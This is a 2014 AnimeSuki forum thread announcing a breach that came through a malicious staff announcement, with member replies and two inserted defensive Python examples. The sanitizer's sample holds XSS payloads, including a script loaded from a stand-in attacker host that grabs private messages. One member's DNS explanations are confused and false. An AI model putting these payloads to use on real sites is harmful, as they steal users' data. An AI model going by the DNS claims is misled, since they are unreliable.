AnimeSuki Forums

Old 2014-05-12, 08:24   Link #1
NightWish
…Nothing More
*Administrator
 
 
Join Date: Mar 2003
Age: 44
Security and Privacy Issue : May-2014

Security and Privacy Announcement
Between the 2nd of May 4pm UTC and 6th of May 6pm UTC the forum was the target of an attack that has compromised user privacy. We are sorry this has happened, that we were unable to stop it sooner, and that it has taken this long to get enough of the facts together to make an announcement.

Currently the information we know to have been disclosed, for all users, includes:
  • Username
  • Email address
  • MD5 hash of salted-password
  • Salt for password
  • IP address used to register
This in itself is a significant breach but additionally it appears highly likely that the stored private messages, of any user who accessed the forum between the 2nd and the 6th, have also been disclosed.

What next?
As a result of this we have reset all passwords on this forum. If you can't log in, this is probably why. Use the password reset form. You should change your password to something new as a matter of urgency. If you use the same password on any other site, you should change it to something else on each of those sites too. Please note the passwords were stored in an encrypted form; however, with the number of people who use common passwords and share passwords across all the sites they visit, as revealed by other data breaches in the news recently, it is safe to assume that a number of them will be compromised even in the encrypted form.

We also suggest you review the private messages you have on the forum to assess the impact of their disclosure to you personally. We are looking for a way to provide more accurate information about who was affected by this but as yet do not have a definitive list.

We don't believe there are any further back-doors but may have to close the forum and restore from a backup to be absolutely sure. This is something we need to wait for GHDpro to handle. If we do, we will endeavour to sanitize and keep any posts more recent than the backup used. Any other steps we take will depend on further investigation.

Attack Details
We do not yet know how the initial account break happened, except to say that a somewhat dormant staff account was used to create an announcement that injected a malicious script in each forum-viewing page, which in turn compromised the forum for each user (and resulted in private messages being downloaded). It is possible your own browser will have a record of this happening, as it was noticed as a back-button problem by some. If you block JavaScript by default you may have been protected.

Unfortunately the full impact of this was not fully understood at first; while the threat was being removed, it may have inadvertently given the attacker access to update another part of the forum, which they then used to download information from the user database. We have since disabled the staff account used in the initial attack, made our access restrictions stricter, and will review how we deal with old and dormant accounts, particularly those with privileged access.

Again, you have our deepest apologies for not better protecting your information and not making you aware of this problem much sooner.

Update May 13 - Forum Server Rebuild Complete (by GHDpro)
Due to this security issue we felt it necessary to completely wipe & rebuild the forum server and restore from backups. The backup that was restored is about two weeks old. However three tables were kept from before the rebuild: users, posts and threads. This means all user accounts (including password changes you may have already done) and posts and threads should have been preserved.

However, anything else posted, changed or uploaded in that time may have been lost, including visitor messages, PMs and any changes to pictures and albums, just to name a few. If you changed your avatar in the past two weeks you might also have to upload it again.

Due to the server rebuild (which took much longer than expected, sorry about that) and the way we restored the forum some things may be broken or not working correctly. Please notify us about this by posting in this thread, thank you.

Last edited by GHDpro; 2014-05-13 at 06:41.
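The attack path in the announcement above (a script placed in an announcement by a staff account, then executed in every visitor's session, which is how the private messages were pulled) is the case for treating HTML that arrives through a privileged interface exactly like HTML from an ordinary poster. The following is an added example, not AnimeSuki's or vBulletin's code: an allowlist sanitizer built on Python's standard library, run over a constructed announcement body that carries a script tag, an inline event handler and a javascript: link. The tag and attribute allowlists, the attacker host and the payload are assumptions made for the example; the real 2014 payload is not on this page.

```python
"""Allowlist HTML sanitizer for content submitted through a privileged forum interface.

Added example, standard library only.  The tag/attribute allowlists and the
sample announcement body are constructed for illustration and are not the
forum's own code or the real 2014 payload.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}}          # no on* handlers, no style, no src
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}  # their text is discarded too
SAFE_URL_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}


def _safe_href(url: str) -> bool:
    """Allow relative URLs and the listed schemes; reject javascript:, data:, vbscript: etc."""
    scheme = urlparse(url.strip()).scheme.lower()
    return scheme == "" or scheme in SAFE_URL_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from scratch, emitting only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0   # > 0 while inside script/style/... content
        self._open = []        # tags we actually emitted, so we only ever close those

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return                      # unknown tag: drop the tag itself, keep its text
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._drop_depth = max(0, self._drop_depth - 1)
            return
        if self._drop_depth or tag not in self._open:
            return
        while self._open:               # close up to the matching tag; tolerates sloppy nesting
            t = self._open.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))

    # Comments, processing instructions and declarations are silently dropped
    # (HTMLParser's default handlers do nothing), which is what we want.

    def result(self) -> str:
        self.close()
        while self._open:               # close anything the author left open
            self.out.append(f"</{self._open.pop()}>")
        return "".join(self.out)


def sanitize(html_text: str) -> str:
    s = AllowlistSanitizer()
    s.feed(html_text)
    return s.result()


# Constructed announcement body in the shape the attack took: innocuous text
# plus a script tag, an inline handler and a javascript: link.  Not the real payload.
MALICIOUS_ANNOUNCEMENT = (
    "<p>test - do not delete</p>"
    '<script src="http://attacker.invalid/pm-grabber.js"></script>'
    "<a href=\"javascript:fetch('/private.php')\" onclick=\"steal()\">read</a>"
    '<img src=x onerror="alert(1)">'
    "<b>ok</b> &amp; <i>fine</i>"
)

if __name__ == "__main__":
    print(sanitize(MALICIOUS_ANNOUNCEMENT))
```

Run against the constructed body this yields `<p>test - do not delete</p><a>read</a><b>ok</b> &amp; <i>fine</i>`: the script element and its source are gone, the inline handler and the javascript: link are stripped from the anchor, and the img with its onerror handler is dropped while ordinary markup survives. Because the sanitizer rebuilds output rather than trying to delete bad patterns from the input, an attacker gains nothing from case tricks, unclosed tags or attribute quoting games; whatever is not on the allowlist never reaches the page.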
Old 2014-05-12, 08:49   Link #2
OH&S
Index III was a mistake
 
 
Join Date: Jul 2013
Location: Sydney, Australia
Age: 32
This is pretty serious. I assume the announcement in question is that random one that appeared in all forums that simply said 'test' and 'do not delete'. In hindsight that was obviously suspicious from the beginning.
Old 2014-05-12, 09:00   Link #3
cyth
Banned
 
Join Date: Dec 2006
Age: 38
Online forums such as these are perfect targets because they have weak security, little motivation to keep security up to and above current standards (which are shit), and enormous user information databases that opens doors elsewhere. It CANNOT be stressed enough that if you use the same OR similar passwords on other sites/services, and have something of worth to lose, you or your organization are most likely fucked.
Old 2014-05-12, 09:07   Link #4
RPG_Fanatic
Fallere825
 
 
Join Date: Dec 2009
Location: Inside my mind
As OH&S mentioned, that test announcement was pretty suspicious. It sucks that something like this happens, but I don't keep compromising information on the discussion forums I visit. I also make sure my passwords to other sites/services like e-mail are completely unique.

I hope no one suffers because of this.
Old 2014-05-12, 09:10   Link #5
Marcus H.
Princess or Plunderer?
 
 
Join Date: May 2009
Location: the Philippines
I don't want to start the blame game, but that particular announcement from that mod has been up for several days. If that was the start of a hacker chomping his way into AnimeSuki's security, then we have all been screwed way before the actual attack had been detected.

Personally, I assumed that it was a new mod that was "testing" his new powers. But then I quickly asked myself that such an event should have been announced earlier.
Old 2014-05-12, 09:15   Link #6
cyth
Banned
 
Join Date: Dec 2006
Age: 38
At least mods/admins should have passwords longer than 20 characters, or even longer passphrases, as a matter of policy.
Old 2014-05-12, 09:20   Link #7
DragoMuseveni
True Dragon
 
 
Join Date: Nov 2013
Location: Riding on Great Red head
Age: 28
You can have a 54-character password, but if you have a keylogger on your PC, or something like that, you are done for. MD5 is pretty vulnerable. That announcement was very suspicious, and when I accessed it, it was only a post (I have Zone Alarm Extreme Security, fully paid, but it didn't show me any alert) with something like: "Please do not delete it, it is only for a test", or something like that.
Old 2014-05-12, 09:25   Link #8
Dengar
Kamen Rider Muppeteer
 
 
Join Date: Jan 2012
Location: Unknown
Age: 39
Well we should be fine as long as the password we use here is different from the one for say, email, right?
Old 2014-05-12, 09:27   Link #9
Thany
Unfair
 
 
Join Date: Nov 2003
I also did notice the announcement. But I didn't think much about it since I knew the guy who made it was a long-time moderator/admin. Thankfully my animesuki password was already some random password I had gotten from a reset since I forgot it a few years ago. Didn't bother changing it, I guess that was a good idea.
Old 2014-05-12, 09:28   Link #10
milan kyuubi
Call me MK! :)
*Graphic Designer
 
 
Join Date: Oct 2009
Location: The top of the world.
Age: 34
Well this sucks big time!

Was this attack similar to the one in 2005?

I also noticed that the whole staff team is gone from "View Forum Leaders"?

Is there anything we as members can do to protect ourselves? Besides simply changing our passwords?

Quote:
Originally Posted by DragoMuseveni
That announcement was very suspicious, and when I accessed it, it was only a post (I have Zone Alarm Extreme Security, fully paid, but it didn't show me any alert) with something like: "Please do not delete it, it is only for a test", or something like that.
I actually used that announcement as reference in my post!
Old 2014-05-12, 09:29   Link #11
Hiss13
No time to sleep, 不幸だ
 
 
Join Date: Aug 2012
Location: The Big Apple
Age: 30
Is there anything the hacker can probably do with the IP Addresses of the users? That's the one thing I'm worried about here...
Old 2014-05-12, 09:29   Link #12
Gary29
Not Bennia Lover
 
 
Join Date: Oct 2013
Age: 26
When I checked said announcement, I figured it was a staff member testing for a possible vulnerability, but I didn't suspect it was an actual attack. Either way, I don't have anything compromising on my account, and I'll be sure to change my password again.

Anything 18 characters and up is pretty secure, but 20 characters minimum is usually safest. Hopefully no one will suffer due to this.
Old 2014-05-12, 09:30   Link #13
Frailty
Constellation
*Graphic Designer
 
 
Join Date: Jan 2008
Location: Pearl of the Orient Seas
Age: 31
Does this mean that our passwords and other related stuff that uses the same e-mail we use here, might be compromised?

Will changing the e-mail we currently use help?
Old 2014-05-12, 09:31   Link #14
DragoMuseveni
True Dragon
 
 
Join Date: Nov 2013
Location: Riding on Great Red head
Age: 28
Quote:
Originally Posted by Hiss13
Is there anything the hacker can probably do with the IP Addresses of the users? That's the one thing I'm worried about here...
Well, it can but can't. As long as he doesn't have the DNS number it's okay. And if you have a routable IP it's better.
Old 2014-05-12, 09:31   Link #15
Sheba
RUN, YOU FOOLS!
 
 
Join Date: Jun 2006
Location: Formerly Iwakawa base and Chaldea. Now Teyvat, the Astral Express & the Outpost
Age: 44
I didn't read moderators and administrators' announcements if those were not active in forums or had not posted before. And announcements that read "test" were just too suspicious when Asuki's announcements were usually never for such frivolous things.
Old 2014-05-12, 09:32   Link #16
Hiss13
No time to sleep, 不幸だ
 
 
Join Date: Aug 2012
Location: The Big Apple
Age: 30
Quote:
Originally Posted by DragoMuseveni
Well, it can but can't. As long as he doesn't have the DNS number it's okay. And if you have a routable IP it's better.
Not sure what you mean here. Can you put it into layman's terms, please?
I don't know much about internet connections and stuff...
Old 2014-05-12, 09:35   Link #17
DragoMuseveni
True Dragon
 
 
Join Date: Nov 2013
Location: Riding on Great Red head
Age: 28
(1) Short for Domain Name System (or Service or Server), an Internet service that translates domain names into IP addresses. Because domain names are alphabetic, they're easier to remember. The Internet however, is really based on IP addresses. Every time you use a domain name, therefore, a DNS service must translate the name into the corresponding IP address. For example, the domain name example.ooo might translate to 198.105.232.4.

The DNS system is, in fact, its own network. If one DNS server doesn't know how to translate a particular domain name, it asks another one, and so on, until the correct IP address is returned.

(2) Short for digital nervous system, a term coined by Bill Gates to describe a network of personal computers that make it easier to obtain and understand information.

And DNS can't be changed unless you buy another PC or go to another internet provider. But DNS is hard to get unless you have access to the PC in question.
Old 2014-05-12, 09:37   Link #18
SeijiSensei
AS Oji-kun
 
 
Join Date: Nov 2006
Age: 74
Quote:
Originally Posted by NightWish
We have since disabled the staff account used in the initial attack, made our access restrictions stricter, and will review how we deal with old and dormant accounts, particularly those with privilege access.
Accounts with anything other than ordinary user access should be closed once a person has retired from administrative duties; at most allow a one or two month grace period. The fact that an admin account was used for this exploit is its most troubling aspect, as I'm sure you all know.
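The announcement's follow-up (stricter access restrictions and a review of old and dormant accounts with privileged access) and SeijiSensei's point that privileged accounts should be closed when someone retires from staff duties both reduce to one recurring check. What follows is an added example, not the forum's own tooling: an audit over a constructed user table that flags privileged accounts with no activity beyond a grace period and produces the demotion it would apply. The field names (usergroupid, lastactivity as a Unix timestamp) follow vBulletin's user table, and the group numbers use vBulletin's stock defaults, but both are assumptions here; any real forum should read its own usergroup table rather than trust these constants.

```python
"""Dormant privileged account audit.

Added example; the usergroup ids, grace period and sample rows are assumptions
made for illustration.  vBulletin does ship numbered admin/moderator groups,
but a forum can renumber them, so treat PRIVILEGED_GROUPS as configuration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Assumed privileged usergroup ids (vBulletin stock defaults: 5 Super Moderators,
# 6 Administrators, 7 Moderators).  Ordinary members are group 2 in the same scheme.
PRIVILEGED_GROUPS = {5: "super moderator", 6: "administrator", 7: "moderator"}
ORDINARY_GROUP = 2
GRACE = timedelta(days=60)   # SeijiSensei's "one or two month" grace period


@dataclass(frozen=True)
class User:
    userid: int
    username: str
    usergroupid: int
    lastactivity: datetime   # stored as a Unix timestamp; converted on load


def load_users(rows):
    """rows: iterable of (userid, username, usergroupid, lastactivity_unix)."""
    return [User(uid, name, gid, datetime.fromtimestamp(ts, tz=timezone.utc))
            for uid, name, gid, ts in rows]


def dormant_privileged(users, now, grace=GRACE):
    """Privileged accounts whose last activity is older than `grace`, most stale first."""
    stale = [u for u in users
             if u.usergroupid in PRIVILEGED_GROUPS and now - u.lastactivity > grace]
    return sorted(stale, key=lambda u: u.lastactivity)


def demotion_plan(users, now, ordinary_group=ORDINARY_GROUP, grace=GRACE):
    """What to change: (userid, username, from_group, to_group, days_idle) per stale account.

    Demoting to the ordinary group rather than deleting keeps the person's posts
    and lets them be re-promoted deliberately if they return."""
    return [(u.userid, u.username, u.usergroupid, ordinary_group, (now - u.lastactivity).days)
            for u in dormant_privileged(users, now, grace)]


# Constructed sample table, not the forum's data.  NOW is the attack's start time
# from the announcement, so "what would this have caught beforehand" is the question.
NOW = datetime(2014, 5, 2, 16, 0, tzinfo=timezone.utc)
SAMPLE_ROWS = [
    (1, "active_admin",   6, int(datetime(2014, 5, 1,  tzinfo=timezone.utc).timestamp())),
    (2, "retired_mod",    7, int(datetime(2013, 9, 15, tzinfo=timezone.utc).timestamp())),
    (3, "quiet_supermod", 5, int(datetime(2014, 2, 20, tzinfo=timezone.utc).timestamp())),
    (4, "ordinary_user",  2, int(datetime(2012, 1, 1,  tzinfo=timezone.utc).timestamp())),
]

if __name__ == "__main__":
    for row in demotion_plan(load_users(SAMPLE_ROWS), NOW):
        userid, name, src, dst, idle = row
        print(f"#{userid} {name}: {PRIVILEGED_GROUPS[src]} idle {idle}d -> group {dst}")
```

Run daily, the plan is short enough to be read by a human before it is applied, which matters: "last activity" is whatever the forum records, and an account that only ever logs in through the admin control panel may look idle to a check that reads the wrong column. The check also says nothing about how the dormant account was taken over in the first place; it only shrinks the number of accounts worth taking over.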
Old 2014-05-12, 09:37   Link #19
Hiss13
No time to sleep, 不幸だ
 
 
Join Date: Aug 2012
Location: The Big Apple
Age: 30
Quote:
Originally Posted by DragoMuseveni
(1) Short for Domain Name System (or Service or Server), an Internet service that translates domain names into IP addresses. Because domain names are alphabetic, they're easier to remember. The Internet however, is really based on IP addresses. Every time you use a domain name, therefore, a DNS service must translate the name into the corresponding IP address. For example, the domain name example.ooo might translate to 198.105.232.4.

The DNS system is, in fact, its own network. If one DNS server doesn't know how to translate a particular domain name, it asks another one, and so on, until the correct IP address is returned.

(2) Short for digital nervous system, a term coined by Bill Gates to describe a network of personal computers that make it easier to obtain and understand information.

And DNS can't be changed unless you buy another PC or go to another internet provider. But DNS is hard to get unless you have access to the PC in question.
Basically, so long as the hacker doesn't have access to your computer, itself, we should be fine in that regard.
Old 2014-05-12, 09:46   Link #20
MeoTwister5
Komrades of Kitamura Kou
 
 
Join Date: Jul 2004
Age: 39
Curiously, is this mod account a new mod or an old mod?
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2024, vBulletin Solutions Inc.